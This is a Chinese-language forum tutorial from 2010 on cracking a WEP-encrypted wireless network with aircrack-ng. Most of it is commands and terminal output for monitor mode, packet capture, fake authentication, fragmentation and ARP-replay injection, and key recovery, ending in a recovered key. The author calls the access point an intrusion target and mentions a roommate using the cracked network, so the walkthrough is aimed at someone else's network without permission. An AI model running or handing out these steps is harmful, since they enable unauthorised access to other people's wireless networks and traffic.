-------------------------------------------------------------------------------------------
(用 aircrack-ng)
-------------------------------------------------------------------------------------------
2010.01.15
-------------------------------------------------------------------------------------------
tyro
-------------------------------------------------------------------------------------------
注:本文的mac地址已被修改,标题纯粹为了吸引人
-----------------------------------------------------------------------------------------
无线网卡信息如下:
0c:00.0 Network controller: Intel Corporation PRO/Wireless 3945ABG [Golan] Network Connection (rev 02)
笔记本型号:
ins1420
--------------------------------------------------------------------------------------------------------
直接下载本文的命令如下:
代码: 全选
wget http://forum.ubuntu.org.cn/download/file.php?id=92758--------------------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------------------
全文开始:
1、打开 终端: 输入:
代码: 全选
ifconfig_______________________________
得到以下结果:
[root@Archlinux ~]# ifconfig
eth0 Link encap:Ethernet HWaddr 00:1A:A0:FF:21:BF
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
Interrupt:17
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:0 (0.0 b) TX bytes:0 (0.0 b)
wlan0 Link encap:Ethernet HWaddr 00:1B:71:BD:69:CC
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:1078 errors:0 dropped:0 overruns:0 frame:0
TX packets:752 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:303752 (296.6 Kb) TX bytes:179166 (174.9 Kb)
________________________________
2、终端输入:
代码: 全选
airmon-ng start wlan0得到如下结果:
[root@Archlinux ~]# airmon-ng start wlan0
Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
2013 NetworkManager
2017 wpa_supplicant
Interface Chipset Driver
wlan0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon0)
3、终端输入:kill 2013 2017 #杀死上面提到的可能造成麻烦的进程<#经测试,可以不杀死进
程!可以跳过@>
4、modprobe iwl3945 #上面得到的关于无线的结果<#经测试,可以跳过>
5、打开 spoonwep,查到您想破解的无线的 信道 ——> spoonwep 开启后 会自动跳出一个扫描窗口,里面有标 ch 下面的那个数字就是信道 ,通常是 1 、6、11 ,我扫到的有以下:(只给一个例子,其实扫出来的很多)(这一步不是必须的,因为后面的命令行中您会看到您需要破解的目标)
BSSID PWR Beacons #Data ,#/s CH MB ENC CIPHER AUTH ESSID
AP'S MAC -83 197+ 133+ 0 6 54e wep wep dlink
BSSID STATION PWR Rate Lost Packets Probes
AP’S MAC mac -43 11e-1e 22+- 2000+ dlink
<只是给出例子,数值不一定是这样的,有些一直在变动>
# AP'S MAC 此处我查到的是 00:24:01:CO:08:F8 (被破解,入侵目标的 MAC 地址)
#197+以及 133+代表这个数字是一直在增加的##破解之后,我舍友使用这地址时,Data 数值增
长很快,但
是之前还未破解时,数值增长很慢,待会儿这个地方也会有变化
#CH 下面的 6,代表信道
#ENC 代表加密方式,此处为 wep 加密
#AUTH ——>请注意,这个待会儿有所变化(具体我也解释不清,我只是使用者)
#ESSID 是这个无线的名称(主人定义的)
————————————————
6、终端
代码: 全选
airmon-ng start mon0 6————————————————
···第 2 中有如下提示 —— (monitor mode enabled on mon0)、6 是信道值···
得到如下结果:
[root@Archlinux ~]# airmon-ng start mon0 6
Process with PID 4162 (airodump-ng) is running on interface mon0
Process with PID 4170 (airodump-ng) is running on interface mon0
Interface Chipset Driver
wlan0 Intel 3945ABG iwl3945 - [phy0]
mon0 Intel 3945ABG iwl3945 - [phy0]
(monitor mode enabled on mon2)
mon1 Intel 3945ABG iwl3945 - [phy0]
7、下面开始抓包:(还是在终端执行)
终端输入
代码: 全选
airodump-ng --ivs -w 333 -c 6 mon0“333” 这个可以任意命名(后面要用到);
-c 6 是确定信道为 6 mon0 是上面开启的,查到的//
注意:这之后您看到和刚才在 spoonwep 开启的窗口类似的结果。(请不要关闭此窗口)
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
00:15:70:D2:0F:84 -1 0 0 34 12 158 -1 OPN <length: 0>
00:24:01:C0:0B:F8 -78 43 1108 1412 35 6 54e WEP WEP dlink
00:26:5A:AC:BC:D6 -83 20 871 0 0 6 54e WPA2 CCMP PSK 405
00:15:70:D2:0F:78 -84 0 92 13 0 6 54 OPN CMCC
00:1D:0F:7E:01:E4 -84 24 860 0 0 6 54 . WEP WEP FR10313
00:25:86:24:1F:86 -86 0 6 0 0 6 54 . WEP WEP F10-210
00:0E:E8:DB:33:EB -87 0 138 0 0 11 54 WPA TKIP PSK ipTIME
00:1B:2F:08:51:E6 -87 0 2 1 0 11 54 . WPA TKIP PSK NETGEAR
00:23:68:09:C9:CC -85 0 31 7 0 6 54 OPN CMCC
00:22:B0:91:64:19 -85 0 6 0 0 6 54 . WPA2 CCMP PSK Karas
00:27:19:9E:30:F6 -1 0 0 0 0 -1 -1 <length: 0>
BSSID STATION PWR Rate Lost Packets Probes
00:15:70:D2:0F:84 00:1B:77:94:AD:04 -87 6-1 19 188 CMCC
(not associated) 00:22:FB:A4:DF:F4 -72 0-1 0 55
8、终端输入:
代码: 全选
aireplay-ng -1 0 -e dlink -a 00:24:01:C0:0B:F8 -h 00:1B:71:BD:69:CC mon0-a 之后是 AP'S BSSID 就是 ap 的 mac 地址
-h 之后是自己的 mac 地址(据说可以用 station 的地址)
得到如下结果:
[root@Archlinux ~]# aireplay-ng -1 0 -e dlink -a 00:24:01:C0:0B:F8 -h 00:1B:71:BD:69:CC mon0
14:48:53 Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 6
14:48:53 Sending Authentication Request (Open System) [ACK]
14:48:53 Authentication successful
14:48:53 Sending Association Request [ACK]
14:48:53 Association successful :-) (AID: 1)
这时候,刚才未关闭的那个窗口 ,即 airodump-ng 窗口 变化显著(可能)
如很明显,则当 data 数值增长到 10000 多的时候可以直接运行下面的命令破解:
_______________________________________________________________________________
[root@Archlinux ~]# aircrack-ng -n 64 -b 002401C00BF8 333-01.ivs
Opening 333-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 1412 ivs.
Aircrack-ng 1.0
[00:00:04] Tested 1562761 keys (got 1412 IVs)
KB depth byte(vote)
0 62/ 63 F3(1756) 69(1720) 90(1720) A8(1720) AF(1720)
1 27/ 1 FA(2124) 6C(2088) 9E(2088) D8(2084) C7(2012)
2 22/ 2 98(2196) 1A(2160) 3A(2160) 70(2160) 99(2160)
3 17/ 40 38(2304) 15(2232) 9D(2232) A6(2232) B7(2196)
4 14/ 40 F2(2232) D8(2196) E9(2160) FF(2160) 17(2124)
Failed. Next try with 5000 Ivs. (因为我中间关闭了一次 airodump-ng 那个窗口,生出了 333-
02.ivs)
# 我的没有很快的增长(只有 1412),所以这里失败了,下面继续(还是可以破解的:—)心
急吃不了热豆腐@!
___________________________________________________________________________________
______________________________
9、
代码: 全选
aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:71:BD:69:CC mon015:07:10 Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 5
15:07:11 mon0 is on channel 5, but the AP uses channel 6
[root@Archlinux ~]# aireplay-ng -5 -b 00:24:01:C0:0B:F8 -h 00:1B:71:BD:69:CC mon1
15:07:29 Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 6
15:07:30 Waiting for a data packet...
Read 2691 packets...
Size: 328, FromDS: 1, ToDS: 0 (WEP)
BSSID = 00:24:01:C0:0B:F8
Dest. MAC = 01:00:5E:7F:FF:FA
Source MAC = 00:24:01:C0:0B:F8
0x0000: 0842 0000 0100 5e7f fffa 0024 01c0 0bf8 .B....^...$....
0x0010: 0024 01c0 0bf8 d066 327e 0200 df2e 869e .$.....f2~......
0x0020: ec2f 54f3 1607 352f b790 45f2 414d 03c2 ./T...5/..E.AM..
0x0030: b9ad de4a 12c1 8da4 a3ad 0d02 801b 35d4 ...J..........5.
0x0040: 8911 ad85 e45f ac37 cfff f38b dc41 a600 ....._.7.....A..
0x0050: 5b21 01cf 9838 d95c d6ef bedc b898 7ec6 [!...8.\......~.
0x0060: 0491 4035 cf43 622d bdfb de72 6964 0299 ..@5.Cb-...rid..
0x0070: f2da f200 d5be c5c7 1a59 7e16 d081 078f .........Y~.....
0x0080: 8f26 3710 dce0 4cb9 5e32 f043 7108 672a .&7...L.^2.Cq.g*
0x0090: 3fa2 e3f9 e7fd ef46 1e3a d911 dc9a 2d1d ?......F.:....-.
0x00a0: 1fa0 598a a787 36a0 8e5e ead1 abb8 96b1 ..Y...6..^......
0x00b0: a6f8 6525 83f5 9b33 1dbd 3fcb b37c 3e2f ..e%...3..?..|>/
0x00c0: 9462 9146 d4a9 0ee9 600d 312d 9b44 b6bb .b.F....`.1-.D..
0x00d0: c5ec 2806 f1be 1b48 0a95 be99 d1c2 6928 ..(....H......i(
--- CUT ---
Use this packet ?
现在选 y
Use this packet ? y
Saving chosen packet in replay_src-0111-150843.cap
15:09:17 Data packet found!
15:09:17 Sending fragmented packet
15:09:19 No answer, repeating...
15:09:19 Trying a LLC NULL packet
15:09:19 Sending fragmented packet
15:09:20 No answer, repeating...
15:09:20 Sending fragmented packet
15:09:22 No answer, repeating...
15:09:22 Trying a LLC NULL packet
15:09:22 Sending fragmented packet
15:09:23 No answer, repeating...
15:09:23 Sending fragmented packet
15:09:23 Got RELAYED packet!!
15:09:23 Trying to get 384 bytes of a keystream
15:09:23 Got RELAYED packet!!
15:09:23 Trying to get 1500 bytes of a keystream
15:09:23 Got RELAYED packet!!
Saving keystream in fragment-0111-150923.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
[root@Archlinux ~]#
看到上面几句关键的话:
Saving keystream in fragment-0111-150923.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
输入 y 后,系统开始发送数据,airodump-ng 窗口一下就有了反应,Data 数立即增长,就没有
必要进行下面的步骤了,等 Data 有 1 万 5 就用 aircrack-ng 破出了密码。)
继续看下面的——
10、输入 ls 查看刚才的文件名,方便待会儿 copy 下:-) (非必须)
[root@Archlinux ~]# ls
333-01.ivs Desktop fragment-0111-150923.xor
333-02.ivs Downloads replay_src-0111-150843.cap
[root@Archlinux ~]#
11、终端输入:
代码: 全选
packetforge-ng -0 -a 00:24:01:C0:0B:F8 -h 00:1B:71:BD:69:CC -k 255.255.255.255 -l 255.255.255.255 -y fragment-0111-150923.xor -w tyro[root@Archlinux ~]# packetforge-ng -0 -a 00:24:01:C0:0B:F8 -h00:1B:71:BD:69:CC -k
255.255.255.255 -l 255.255.255.255 -y fragment-0111-150923.xor -w tyro
Wrote packet to: mrarp
12、
代码: 全选
aireplay-ng -2 –r tyro-x 1024 mon1mon1(正常的话应该是 mon0)
15:07:29 Waiting for beacon frame (BSSID: 00:24:01:C0:0B:F8) on channel 6
15:07:30 Waiting for a data packet...
Read 2691 packets...这里是 mon1 哟)
[root@Archlinux ~]# aireplay-ng -2 -r tyro-x 1024 mon1
No source MAC (-h) specified. Using the device MAC (00:1B:71:BD:69:CC)
Size: 68, FromDS: 0, ToDS: 1 (WEP)
BSSID = 00:24:01:C0:0B:F8
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 00:1B:71:BD:69:CC
0x0000: 0841 0201 0024 01c0 0bf8 001b 77d8 630c .A...$......w.c.
0x0010: ffff ffff ffff 8001 437e 0200 769d a167 ........C~..v..g
0x0020: e1af 7926 ebca 352f b7cb 1002 53d7 59d3 ..y&..5/....S.Y.
0x0030: bb77 0e95 8732 d16a 2e18 0a49 0bd1 2acf .w...2.j...I..*.
0x0040: c256 37aa .V7.
Use this packet ?
选y
得到:
Saving chosen packet in replay_src-0111-151709.cap
You should also start airodump-ng to capture replies.
此时 dump 那个窗口 data 哗哗的上涨,请不要关闭此窗口
12、另外再开一个 terminal 输入:
ls
得到:
[root@Archlinux ~]# ls
333-01.ivs Desktop fragment-0111-150923.xor replay_src-0111-150843.cap
333-02.ivs Downloads mrarp replay_src-0111-151709.cap
[root@Archlinux ~]#
terminal输入:
代码: 全选
aircrack-ng -n 64 -b 00:24:01:C0:0B:F8 333-02.ivs口,所以 ls 之后有两个 ivs)!!!!!!!!!!!!!!!!!!!!!!!!(正常应该是 333-01.ivs)!!!!!!!!!!!!!!!!
得到:
[root@Archlinux ~]# aircrack-ng -n 64 -b 00:24:01:C0:0B:F8 333-01.ivs
Opening 333-01.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 1412 ivs.
Aircrack-ng 1.0
[00:00:04] Tested 1562761 keys (got 1412 IVs)
KB depth byte(vote)
0 62/ 63 F3(1756) 69(1720) 90(1720) A8(1720) AF(1720)
1 27/ 1 FA(2124) 6C(2088) 9E(2088) D8(2084) C7(2012)
2 22/ 2 98(2196) 1A(2160) 3A(2160) 70(2160) 99(2160)
3 17/ 40 38(2304) 15(2232) 9D(2232) A6(2232) B7(2196)
4 14/ 40 F2(2232) D8(2196) E9(2160) FF(2160) 17(2124)
Failed. Next try with 5000 IVs. (错了是因为当时我关闭了一次 airedump-ng 窗口,后来又再次
运行那个命令生出另一个 ivs)
[root@Archlinux ~]#
代码: 全选
aircrack-ng -n 64 -b 00:24:01:C0:0B:F8 333-02.ivsOpening 333-02.ivs
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 34551 ivs.
Aircrack-ng 1.0
[00:00:00] Tested 154 keys (got 17607 IVs)
KB depth byte(vote)
0 0/ 1 15(27136) 5A(23552) 7D(23040) A4(22784) A2(22528)
1 3/ 8 80(22272) E4(22272) 17(22016) 48(22016) 66(21760)
2 1/ 3 BE(23808) EE(23296) 1E(23040) 87(23040) 89(23040)
3 0/ 4 12(24832) 69(23552) 5B(23296) D0(23296) AE(23040)
4 0/ 2 06(24064) 7F(23296) AE(22272) 69(22016) DE(22016)
KEY FOUND! [ 15:80:59:12:06 ]
#这个去除:就是密码! !!!
Decrypted correctly: 100%
[root@Archlinux ~]#
这里就是密码了。8)
Decrypted=破解
---------------------------------------------------------------------------------------------------------------------------
13、看的这里的不容易:
给一个最好的方法:(也不是太好)
打开 spoonwep 客户端,找到要攻击的 mac 地址以及信道
终端输入如下命令:
代码: 全选
wesside-ng -i mon0 -v 目标的 MAC代码: 全选
sudo airmon-ng stop mon0
